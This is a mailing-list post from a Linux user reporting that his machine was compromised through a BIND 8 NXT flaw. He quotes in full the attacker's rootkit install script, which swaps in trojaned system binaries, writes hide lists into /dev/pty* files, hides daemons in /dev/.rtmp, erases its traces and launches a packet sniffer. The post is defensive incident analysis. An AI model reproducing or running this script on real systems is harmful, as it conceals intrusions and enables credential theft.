>I guess I'd try something like "cat /dev/null>/var/run/utmp" trying to
>recreate the file and see if it makes any difference, although something
>tells me that wouldn't work, at least in the long run. In any case, the
>whole thing sounds way too suspicious to me. I would hate to cause any
>innecessary alarm, but perhaps it would be wise to consider that the
>system may have been compromised. Did you take a look at all the log
>files to make sure everything is right? How about the bash history? A
>possible cracker may have installed a root kit that is causing all these
>problems. Just a suggestion.
>Nitebirdz
The system was compromised. It looks like the first initial entry was
Jan 24, when the first batch of files were deposited in "/usr/ /".
But nothing seemed to have really occurred until the 24/25th.
Looking at the files that the idiot left behind, this is what the
install script did:
./fix /usr/bin/chfn bin/chfn
./fix /usr/bin/chsh bin/chsh
./fix /bin/login bin/login
./fix /bin/ls fileutils-3.13/src/ls
./fix /bin/du fileutils-3.13/src/du
./fix /usr/bin/passwd bin/passwd
./fix /bin/ps procps-1.01/ps
./fix /usr/bin/top procps-1.01/top
./fix /usr/sbin/in.rshd rshd/rshd
./fix /bin/netstat net-tools-1.32-alpha/netstat
./fix /sbin/ifconfig net-tools-1.32-alpha/ifconfig
./fix /usr/sbin/syslogd sysklogd-1.3/syslogd
./fix /usr/sbin/inetd inetd/inetd
./fix /usr/sbin/tcpd tcpd_7.4/tcpd
./fix /usr/bin/killall psmisc/killall
./fix /bin/killall psmisc/killall
ln -sf /bin/killall psmisc/pidof
ln -sf /usr/bin/killall psmisc/pidof
./fix /usr/bin/pidof psmisc/pidof
./fix /sbin/pidof psmisc/pidof
./fix /usr/bin/find findutils/find/find
echo ".rtmp" > /dev/ptyr
echo ".tmp" >> /dev/ptyr
echo "..." >> /dev/ptyr
echo " " >> /dev/ptyr
echo "rk" >> /dev/ptyr
echo "rks" >> /dev/ptyr
echo ".. " >> /dev/ptyr
echo "3 imap" > /dev/ptyp
echo "3 eggdrop" >> /dev/ptyp
echo "3 conf" >> /dev/ptyp
echo "3 sniff" >> /dev/ptyp
echo "unknown" > /dev/ptys
echo "unk" >> /dev/ptys
echo "unkn0wn" >> /dev/ptys
echo "crime" >> /dev/ptys
echo "1 195" > /dev/ptyq
echo "1 207" >> /dev/ptyq
echo "1 63" >> /dev/ptyq
killall -9 rpc.mountd rpc.portmap rpc.nfsd smbd portmap 1>/dev/null 2>/dev/null
killall -9 named nmbd snmpd ypasswd 1>/dev/null 2>/dev/null
killall -9 rpc.yppasswdd 1>/dev/null 2>/dev/null
mkdir /dev/.rtmp 1>/dev/null 2>/dev/null
mv /usr/sbin/rpc.* /dev/.rtmp 1>/dev/null 2>/dev/null
mv /usr/sbin/smbd /dev/.rtmp 1>/dev/null 2>/dev/null
mv /usr/sbin/portmap /dev/.rtmp 1>/dev/null 2>/dev/null
mv /usr/sbin/nmbd /dev/.rtmp 1>/dev/null 2>/dev/null
mv /usr/sbin/named /dev/.rtmp 1>/dev/null 2>/dev/null
mv /usr/sbin/snmpd /dev/.rtmp 1>/dev/null 2>/dev/null
mv /usr/sbin/imapd /dev/.rtmp 1>/dev/null 2>/dev/null
cat /etc/inetd.conf|grep -v imap > /etc/inetd.conf.good
mv /etc/inetd.conf.good /etc/inetd.conf
killall -HUP inetd 1>/dev/null 2>/dev/null
rm -rf bin fileutils-3.13 findutils fix inetd
rm -rf net-tools-1.32-alpha procps-1.01 psmisc rshd sysklogd-1.3
rm -rf tcpd_7.4 Makefile
if test -f ../rk.tgz; then rm -rf ../rk.tgz; fi 1>/dev/null 2>/dev/null
3>/dev/null
if test -f ../rk.tar; then rm -rf ../rk.tar; fi 1>/dev/null 2>/dev/null
3>/dev/null
if test -f ../u.tgz; then tar -zxf ../u.tgz; rm -rf ../u.tgz; fi 1>/dev/null
2>/dev/null 3>/dev/null
./linsniffer > tcp.log &
The script wasn't perfect because find wasn't really "fix"ed. It was still
able to find directories with a space and display them. The ls wasn't
fixed either, in that it displayed the /dev/.rtmp directory. My guess is
that it probably should not have.
The stupid thing is that if for any reason I would have had to reboot, I
would have discovered this earlier, as the login was changed so that it
wouldn't let anyone in. It did password checking only in /etc/passwd, the
shadow system was not used and no matter what password was assigned, I
could not log in. Pretty broken.
I'm back up temporarily, as I only did an upgrade install from 6.0 to 6.1
and there appear to be some config files that are not right, like inetd.conf.
The Elm program doesn't know where my mail is, i.e., it tries to open
/var/spool/mail. Yep, no user name. I'm using the Zshell.
So, it is back down shortly to do a complete install from scratch, which
sucks, but needs to be done. I've already copied everything over to the
extra hard disk space that I have, so that I can rebuild the other programs
and stuff that I have installed.
All because bind 8's NXT was broken, the guy got in. BTW, all the stuff
does is go out and probe other IP addresses for broken binds. There were
three class B groups that got probed with the files that are still here.
When I'm back up again, I will be posting a complete list of what I know
to my web site. It will be worth a look.
More later. It is going to be a long night.
MB
--
e-mail: [EMAIL PROTECTED]
Bart: Hey, why is it destroying other toys? Lisa: They must have
programmed it to eliminate the competition. Bart: You mean like
Microsoft? Lisa: Exactly. [The Simpsons - 12/18/99]
Visit - URL:http://www.vidiot.com/ (Your link to Star Trek and UPN)
--
To unsubscribe: mail [EMAIL PROTECTED] with "unsubscribe"
as the Subject.
